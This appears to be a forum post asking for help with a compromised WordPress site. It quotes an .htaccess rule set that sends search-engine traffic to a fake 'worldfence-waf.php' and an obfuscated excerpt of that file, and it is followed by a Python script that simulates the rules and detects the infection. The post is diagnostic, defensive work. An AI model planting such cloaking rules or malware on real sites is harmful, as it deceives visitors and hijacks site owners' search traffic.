Hello all,
The tech support company I work for was asked by one of our clients to provide assistance when their hosted WordPress site told them that their allotted disk space (100 GB) was used up.
Our support is mostly hardware, so we are not WordPress experts, but when I saw a file structure like this I got a very bad feeling:
www.oursite.com
html/[All Things WordPress]
tmp/x/x/x/[randomfilenames] *
*where x is a hex number between 0 and f
This file structure held over 1,000,000 base64 files that turned out to be fully formed bogus web pages based on their real site's look and feel.
The .htaccess file read:
# BEGIN WordPress
RewriteEngine On
RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{HTTP_USER_AGENT} (yahoo|msn|bing|google|aol|duckduck) [OR]
RewriteCond %{HTTP_REFERER} (yahoo|msn|bing|google|aol|duckduck)
RewriteRule ^.*$ /worldfence-waf.php [L]
# END WordPress
ErrorDocument 403 /errors/forbidden.html
ErrorDocument 404 /errors/not_found.html
and the offending code that created all this mess was, you guessed it:
worldfence-waf.php (note that this does not read WORDfence-waf.php)
I was able to decode some of it but have not been able to completely see what it does. But I suspect it is an attempt to hijack the site and show bad things to their viewers who arrive via a web search...
I said all that to ask: has anyone seen this behavior before? I saw tmp files going back to 2015, so it has been in place for some time, but googling is not turning up anything usable in this case.
When I searched for worldfence-waf I saw a few more sites that may have this installed as well (on this site you see an error message that mentions worldfence-waf in the blue stripe at the top of the page: http://www.jim-cor.com/Jim-Cor_Distributors_Inc./Contact_Us.html - you only see the error message if you get there from a search), but no discussions on any forum...
I used unPHP to see some of the code. Here are the first few lines of the worldfence file:
<?php /*DPmfFXwNGZFi_dUqv:GLzO7i(42;|%y3Q$)efCwKF)T,-w#Fh3m'&onQG8w8U|WUb^%2l7#x=)hGoEiLy0xoK=(.K29a$"se2V9$WOG9NWa:6C5F')?C*/
/*p$4")i0k.vJpC&vG"QXXBynkpmp|J^GfQ67%HW%7V$^|8+_Wk9fg46E$2='nb4z5*#':5KyptK?:Qrhmv"H4KaLVR(K"NWiq-*$GF%!.-W?t2cBhvj@o,JH;9d'5,X-|)kzz&wq+pi^aotKHl_(?drsQC+pIb7A|S4:Z"uNiNaJmB,Jh1_&.nF*/
/*p$4")i0k.vJpC&vG"QXXBynkpmp|J^GfQ67%HW%7V$^|8+_Wk9fg46E$2='nb4z5*#':5KyptK?:Qrhmv"H4KaLVR(K"NWiq-*$GF%!.-W?t2cBhvj@o,JH;9d'5,X-|)kzz&wq+pi^aotKHl_(?drsQC+pIb7A|S4:Z"uNiNaJmB,Jh1_&.nF*/
@error_reporting(0);
/*p$4")i0k.vJpC&vG"QXXBynkpmp|J^GfQ67%HW%7V$^|8+_Wk9fg46E$2='nb4z5*#':5KyptK?:Qrhmv"H4KaLVR(K"NWiq-*$GF%!.-W?t2cBhvj@o,JH;9d'5,X-|)kzz&wq+pi^aotKHl_(?drsQC+pIb7A|S4:Z"uNiNaJmB,Jh1_&.nF*/
chdir(dirname(__FILE__));
/*p$4")i0k.vJpC&vG"QXXBynkpmp|J^GfQ67%HW%7V$^|8+_Wk9fg46E$2='nb4z5*#':5KyptK?:Qrhmv"H4KaLVR(K"NWiq-*$GF%!.-W?t2cBhvj@o,JH;9d'5,X-|)kzz&wq+pi^aotKHl_(?drsQC+pIb7A|S4:Z"uNiNaJmB,Jh1_&.nF*/
/*p$4")i0k.vJpC&vG"QXXBynkpmp|J^GfQ67%HW%7V$^|8+_Wk9fg46E$2='nb4z5*#':5KyptK?:Qrhmv"H4KaLVR(K"NWiq-*$GF%!.-W?t2cBhvj@o,JH;9d'5,X-|)kzz&wq+pi^aotKHl_(?drsQC+pIb7A|S4:Z"uNiNaJmB,Jh1_&.nF*/
function get_url($url) {
/*p$4")i0k.vJpC&vG"QXXBynkpmp|J^GfQ67%HW%7V$^|8+_Wk9fg46E$2='nb4z5*#':5KyptK?:Qrhmv"H4KaLVR(K"NWiq-*$GF%!.-W?t2cBhvj@o,JH;9d'5,X-|)kzz&wq+pi^aotKHl_(?drsQC+pIb7A|S4:Z"uNiNaJmB,Jh1_&.nF*/
As you can see there are PHP functions, but everything in the function is commented out (/*...*/).
Does anyone have any thoughts or pointers to where this topic might fit better?
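As an added example (not code from the original post or from any of the sites mentioned), here is a small Python script that reproduces what the quoted .htaccess does and checks for the two indicators the post describes: search-engine-gated rewrites to a PHP file, and a tmp/x/x/x hex-bucketed cache of base64 pages. The .htaccess text is the one quoted above; the function names, sample requests, sample paths and sample base64 blob are constructed for illustration and are not real traffic or real files.

```python
"""Simulator for the posted .htaccess cloaking rules plus detectors for the
indicators in the post. Sample requests, paths and blob are constructed."""
import base64
import re

HTACCESS = """\
# BEGIN WordPress
RewriteEngine On
RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{HTTP_USER_AGENT} (yahoo|msn|bing|google|aol|duckduck) [OR]
RewriteCond %{HTTP_REFERER} (yahoo|msn|bing|google|aol|duckduck)
RewriteRule ^.*$ /worldfence-waf.php [L]
# END WordPress
ErrorDocument 403 /errors/forbidden.html
ErrorDocument 404 /errors/not_found.html
"""

SEARCH_ENGINES = ("yahoo", "msn", "bing", "google", "aol", "duckduck")
COND_RE = re.compile(r"^RewriteCond\s+%\{(\w+)(?::(\w+))?\}\s+(\S+)\s*(?:\[([^\]]+)\])?$")
RULE_RE = re.compile(r"^RewriteRule\s+(\S+)\s+(\S+)\s*(?:\[([^\]]+)\])?$")
# tmp/<hex>/<hex>/<hex>/<name>: the cache layout described in the post.
HEX_BUCKET_RE = re.compile(r"^tmp/[0-9a-f]/[0-9a-f]/[0-9a-f]/[^/]+$")


def _flags(text):
    return {f.strip().upper() for f in (text or "").split(",") if f.strip()}


def parse_rules(htaccess):
    """Group each RewriteRule with the RewriteCond lines preceding it."""
    rules, pending = [], []
    for raw in htaccess.splitlines():
        line = raw.strip()
        m = COND_RE.match(line)
        if m:
            var = m.group(2) or m.group(1)  # %{ENV:X} -> X, %{HTTP_REFERER} -> HTTP_REFERER
            pending.append((var, m.group(3), _flags(m.group(4))))
            continue
        m = RULE_RE.match(line)
        if m:
            rules.append({"conds": pending, "pattern": m.group(1),
                          "target": m.group(2), "flags": _flags(m.group(3))})
            pending = []
    return rules


def conds_match(conds, env):
    """Apache semantics: conditions AND together; [OR] joins one with the next.
    No [NC] flag in the posted rules, so matching is case-sensitive."""
    groups, current = [], []
    for var, pattern, flags in conds:
        current.append(re.search(pattern, env.get(var, "")) is not None)
        if "OR" not in flags:
            groups.append(any(current))
            current = []
    if current:  # trailing [OR]; be lenient
        groups.append(any(current))
    return all(groups)


def resolve(rules, path, env):
    """One rewrite pass: return the path the request ends up at."""
    for rule in rules:
        if re.search(rule["pattern"], path) and conds_match(rule["conds"], env):
            if rule["target"] != "-":
                path = rule["target"]
            if "L" in rule["flags"]:
                break
    return path


def find_cloaking(rules):
    """Targets that only search-engine bots or search referrals are sent to."""
    hits = []
    for rule in rules:
        gated = any(var in ("HTTP_USER_AGENT", "HTTP_REFERER")
                    and any(e in pat.lower() for e in SEARCH_ENGINES)
                    for var, pat, _ in rule["conds"])
        if gated and rule["target"] != "-":
            hits.append(rule["target"])
    return hits


def count_bucketed(paths):
    """How many paths sit in the tmp/x/x/x hex-bucket layout."""
    return sum(1 for p in paths if HEX_BUCKET_RE.match(p))


def looks_like_doorway(blob):
    """True if a cache file is base64 that decodes to an HTML document."""
    try:
        body = base64.b64decode(blob, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    return b"<html" in body.lower()


# Constructed sample data, not real traffic or files.
BOT = {"HTTP_USER_AGENT": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"}
HUMAN = {"HTTP_USER_AGENT": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/100.0"}
HUMAN_FROM_SEARCH = dict(HUMAN, HTTP_REFERER="https://www.google.com/")
SAMPLE_PATHS = ["html/wp-config.php", "tmp/3/a/f/Qk9ndXM", "tmp/c/0/1/XyZ123",
                "tmp/cache/session.dat"]
SAMPLE_BLOB = base64.b64encode(b"<html><head><title>constructed doorway</title></head></html>")

if __name__ == "__main__":
    rules = parse_rules(HTACCESS)
    print("human  ->", resolve(rules, "/index.php", HUMAN))
    print("bot    ->", resolve(rules, "/index.php", BOT))
    print("search ->", resolve(rules, "/index.php", HUMAN_FROM_SEARCH))
    # Second pass after the internal redirect: REDIRECT_STATUS=200 stops the loop.
    print("2nd    ->", resolve(rules, "/worldfence-waf.php", dict(BOT, REDIRECT_STATUS="200")))
    print("cloaked targets:", find_cloaking(rules))
    print("bucketed files :", count_bucketed(SAMPLE_PATHS))
    print("doorway blob   :", looks_like_doorway(SAMPLE_BLOB))
```

Two things the simulation makes visible: a visitor with an ordinary browser is left alone, while a search-engine crawler or a person clicking through from a search result is handed to worldfence-waf.php, which is why the site owner never saw anything wrong; and the first RewriteCond on REDIRECT_STATUS is what keeps the rewrite from looping on the internal subrequest. On a live box, run count_bucketed over os.walk output from the site root rather than the constructed list.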